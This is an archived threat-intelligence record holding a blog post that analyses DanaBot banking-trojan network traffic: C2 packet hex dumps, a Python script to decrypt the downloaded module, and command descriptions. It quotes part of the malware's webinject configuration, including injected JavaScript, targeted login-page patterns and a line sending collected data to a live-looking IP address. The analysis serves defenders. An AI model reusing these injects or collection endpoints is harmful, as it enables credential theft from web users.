{
	"id": "8a81a144-072e-4ebc-bd14-839343532395",
	"created_at": "2026-04-06T01:29:29.326499Z",
	"updated_at": "2026-04-10T03:21:33.122409Z",
	"deleted_at": null,
	"sha1_hash": "3c80b2f65cf422fa399a768d9e5e5a38dba5f19b",
	"title": "DanaBot Communications Update",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 60815,
	"plain_text": "DanaBot Communications Update\r\nArchived: 2026-04-06 00:15:34 UTC\r\nSince the last blog post from Proofpoint about the version 4 of DanaBot, the new samples available in Threat Intel\r\nrepository integrate minor changes in their architecture and communications. This short blog post is about the\r\ndifferences spot between those different versions. As a reminder, you can find details on the four major versions\r\nhere:\r\nUnlike the previous versions, the latest samples found in public repositories included a component that first\r\ndownloaded and loaded the main module along with configurations and plugins. That's why two TCP stream\r\nappear instead of one in the version 4:\r\nThe first TCP connection comes from the Downloader, who downloads the main module (about 14 Mb of\r\nencrypted and compressed data) and the second one from the main module itself (similar to version 4).\r\nThe requests sent above respect the DanaBot communication protocol described by ESET. The first packet is used\r\nto transmit the new RSA public key generated on the host, and the second one is a packet with a very specific\r\nstructure used to send instructions and data to the C2.\r\nLike version 4, the packet structure is binary format and has a plaintext header (0x1C-bytes long). The packet data\r\nstructure size is lower than version 4 with 455 bytes and some hashes embedded in the structure are formatted\r\ndifferently. Indeed, before all hashes were formatted using the Delphi TMemoryStream classes and now only the\r\n\"random hash\" has kept this format. You can find below the packet structure used by the Downloader to download\r\nthe main module:\r\nYou can find below an example of request generated and sent by the Downloader to download the main module:\r\n00000000: [c7 01 00 00][12 66 00 00 00 00 00 00][d9 67 00 00 .....f.......g..\r\n00000010: 00 00 00 00][04 00 00 00][d0 0f 00 00][00 00 00 00] ................\r\n00000020: [00 00 00 00][00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00][20][36 41 44 ............ 6AD\r\n00000060: 39 46 45 34 46 39 45 34 39 31 45 37 38 35 36 36 9FE4F9E491E78566\r\n00000070: 35 45 30 44 31 34 34 46 36 31 44 41 42][20][36 41 5E0D144F61DAB 6A\r\n00000080: 44 39 46 45 34 46 39 45 34 39 31 45 37 38 35 36 D9FE4F9E491E7856\r\n00000090: 36 35 45 30 44 31 34 34 46 36 31 44 41 42][20][35 65E0D144F61DAB 5\r\n000000a0: 34 37 34 41 39 35 46 34 39 37 36 42 43 31 38 33 474A95F4976BC183\r\n000000b0: 37 33 31 31 45 39 44 33 42 32 36 46 39 36 45][20 7311E9D3B26F96E\r\n000000c0: 00 00 00][ef 16 f0 dd][46 37 39 30 45 45 34 45 37 .......F790EE4E7\r\n000000d0: 38 46 32 43 38 34 34 37 41 38 38 30 43 46 31 43 8F2C8447A880CF1C\r\n000000e0: 43 44 42 32 46 46 32 00][00 00 00 00 00 00 00 00 CDB2FF2.........\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\nhttps://blog.lexfo.fr/danabot-malware.html\r\nPage 1 of 5\n\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00] .......\r\nEach data received from the C2 is encrypted using AES and the key located in the last 80 bytes is itself encrypted\r\nusing RSA. The needed RSA key is the private key generated by the Downloader.\r\nThe main module is protected by a second layer of encryption on top of DanaBot communication. Indeed, the\r\nmodule is encrypted using the same technics, but the needed RSA key is the one embedded in the Downloader.\r\nThe AES deciphering is using CBC mode with a null IV and it operates by blocks of 0x10010 bytes. It can be\r\nresumed with the following scripts:\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Util.Padding import unpad\r\nfrom wincrypto import CryptImportKey, CryptDecrypt\r\nimport pwn\r\nimport sys\r\nif len(sys.argv) == 3:\r\n hardcoded_key = open(sys.argv[1], 'rb').read()\r\n enc_data = open(sys.argv[2], 'rb').read()\r\nelse:\r\n exit()\r\ndef aes_decrypt(key, data):\r\n cipher = AES.new(key, AES.MODE_CBC, iv=b\"\\x00\" * 16)\r\n plaintext = unpad(cipher.decrypt(data), AES.block_size)\r\n return plaintext\r\nrsa_pub_key = CryptImportKey(hardcoded_key)\r\nencrypted_aes_key = CryptDecrypt(rsa_pub_key, enc_data[-0x80:])\r\nprint(\"AES key : %s\" % encrypted_aes_key[-0x20:].hex())\r\nhttps://blog.lexfo.fr/danabot-malware.html\r\nPage 2 of 5\n\nenc_data = enc_data[0x0:-0x80]\r\naes_bloc_size = pwn.u32(enc_data[-0x4:])\r\nenc_data = enc_data[0x0:-0x4]\r\nlen_enc_data = len(enc_data)\r\noffset = 0\r\nfinal = b''\r\nwhile len_enc_data \u003e 0:\r\n if len_enc_data \u003c= 0x100000:\r\n pdwDataLen = len_enc_data\r\n else:\r\n pdwDataLen = 0x100000 + aes_bloc_size\r\n dec = aes_decrypt(encrypted_aes_key[-0x20:], enc_data[offset:offset + pdwDataLen])\r\n final = final + dec\r\n len_enc_data = len_enc_data - pdwDataLen\r\n offset = offset + pdwDataLen\r\nwith open(\"./aes_decrypt_file.bin\", \"wb\") as f:\r\n f.write(final)\r\nOnce decrypted, the first four bytes are the compressed buffer size followed by the Zlib magic headers and data:\r\n00000000:[35 29 d1 00][78 9c][bc bd 0b 7c 53 55 b6 30 7e 92 5)..x....|SU.0~.\r\n00000010: 9c 36 69 1b 9a 14 82 14 44 2c 1a 15 04 91 5a 54 .6i.....D,....ZT\r\n00000020: .. ..]\r\nThe uncompressed data is a DLL (the main module) similar to the unpack main module in version 4, although it\r\nseems bigger with a size around 18M. Further communications from the main module are similar to version 4 as\r\ndescribed in the Proofpoint blog post, except that the data structure is the same as talked previously:\r\nDanaBot commands and sub-commands are used to indicate to the recipient how to handle data. On the version\r\nanalyzed, all the main commands (with id 2048) and sub-commands described by Proofpoint are still present\r\nexcept for the sub-command 10 since the Tor module is already included.\r\nThis sub-command is used for online functionalities, that's why C2 reply may be empty. By analyzing these parts,\r\ntwo \"online\" functionalities were added. The first one may still be under development. Indeed, except the strings\r\n\"InstallRDP\" found in the function, nothing much is done.\r\nThe second one is very similar to the stealer plugin (started in a thread at the beginning of the process) and the\r\nfollowing information is gathered on the victim host:\r\nThis sub-command is mainly used to activate/deactivate plugins and set options. First, the main module is asking\r\nto the C2 the list of \"CommandRecords\" available by sending the sub-command 2. A list of hashes is received:\r\nhttps://blog.lexfo.fr/danabot-malware.html\r\nPage 3 of 5\n\n00000000: 3336 3931 4335 4244 3239 4239 4432 3333 3691C5BD29B9D233\r\n00000010: 3933 3946 4345 4538 4438 3444 3246 3845 939FCEE8D84D2F8E\r\n00000020: 0d0a 3342 3446 4438 4234 4530 4644 3130 ..3B4FD8B4E0FD10\r\n00000030: 4143 4537 4443 3537 3741 3137 3033 3635 ACE7DC577A170365\r\n00000040: 4232 0d0a 3446 3036 3833 3742 4339 3530 B2..4F06837BC950\r\n00000050: 3237 3839 4242 4638 4639 3834 4639 3730 2789BBF8F984F970\r\n00000060: 3841 3537 0d0a 3632 3236 4334 3531 4645 8A57..6226C451FE\r\n00000070: 4333 3144 4346 4143 4332 3830 3437 4338 C31DCFACC28047C8\r\n00000080: 4238 4237 4338 0d0a 3533 3530 3136 4146 B8B7C8..535016AF\r\n00000090: 4345 3845 4432 4231 3430 3436 4338 4644 CE8ED2B14046C8FD\r\n000000a0: 4534 4635 4244 4233 0d0a E4F5BDB3..\r\nThen, for each of those hashes, the sub-command 3 is sent with the \"CommandRecords\" hash in parameters. In the\r\ndata received, there is a command field that indicates to the main module how to handle and what to do with the\r\npayload located at the packet end:\r\n00000000: [20][33 36 39 31 43 35 42 44 32 39 42 39 44 32 33 3691C5BD29B9D23\r\n00000010: 33 39 33 39 46 43 45 45 38 44 38 34 44 32 46 38 3939FCEE8D84D2F8\r\n00000020: 45][04 00 00 00][0c 00 00 00][00 00 00 00 00 00 00 E...............\r\n...\r\n000006b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00][0a 00 ................\r\n000006c0: 00 00] 00 00 00 00 [33 36 30 7c 31 7c 7c 7c 0d 0a] ......360|1|||..\r\nIn the above example, the command number is 12, the payload can be forward to the right function:\r\nSince version 4, new functions were added to parse the Webinject and Webfilter configuration (Zeus style)\r\nreceived.\r\nset_local_variables ybhftdhnb65\r\nset_url https://code.jquery.com/jquery*.js* https://apis.google.com/js/client.js* https://clients5.google.com/ad\r\ndata_before\r\n*\r\ndata_end\r\ndata_inject\r\n(function(){var s_d_i={t:1000*60*60*24*7,b:'%bot_id%',v:'%bot_version%',n:'%timenow%',s:'%local_variables=_stat_\r\ndata_end\r\ndata_after\r\ndata_end\r\nhttps://blog.lexfo.fr/danabot-malware.html\r\nPage 4 of 5\n\n*|1|2||\r\n*.youtube.com*|0|1||\r\n*.discordapp.com*|0|1||\r\n*.facebook.com*|0|1||\r\n*myhentaigallery.com*|0|1||\r\n*chat.google.com*|0|1||\r\n*.messenger.com/ajax/*|0|1||\r\n*.bing.com/rewardsapp/*|0|1||\r\n*api.us-east-1.aiv-delivery.net*|0|1||\r\n*agafurretor.com/event*|0|1||\r\n*openclassrooms.workplace.com/api/*|0|1||\r\n*signaler-pa.clients6.google.com*|0|1||\r\n*drive.google.com/drive*|0|1||\r\n*.facebook.com/ads/*|1|1||\r\n*.messenger.com/login/password*|1|1||\r\n*business.facebook.com*|1|1||\r\n*.facebook.com/login.php*|1|1||\r\n*.facebook.com/ajax/register.*|1|1||\r\n*.facebook.com/ajax/bulk-route-definitions/*|0|1||\r\n*.facebook.com/ajax/relay-ef/*|0|1||\r\n*.facebook.com/ajax/webstorage/process_keys/*|0|1||\r\n*.facebook.com/ajax/navigation/*|0|1||\r\n*youtube-nocookie.com/youtubei/v1/log_event*|0|1||\r\n*facebook.com/ajax/timezone/update.php*|0|1||\r\n*facebook.com/ajax/route-definition*|0|1||\r\n*metrfaiuerqoiu*|https://88.150.227.98/collect|||\r\nIn a few weeks, the hardcoded version embedded in each sample has increased 2 or 3 times, meaning that the\r\nTrojan DanaBot is still under active development. We expect to see other new features coming in the near future\r\nand maybe another blog post with more details.\r\nSource: https://blog.lexfo.fr/danabot-malware.html\r\nhttps://blog.lexfo.fr/danabot-malware.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.lexfo.fr/danabot-malware.html"
	],
	"report_names": [
		"danabot-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438969,
	"ts_updated_at": 1775791293,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3c80b2f65cf422fa399a768d9e5e5a38dba5f19b.pdf",
		"text": "https://archive.orkl.eu/3c80b2f65cf422fa399a768d9e5e5a38dba5f19b.txt",
		"img": "https://archive.orkl.eu/3c80b2f65cf422fa399a768d9e5e5a38dba5f19b.jpg"
	}
}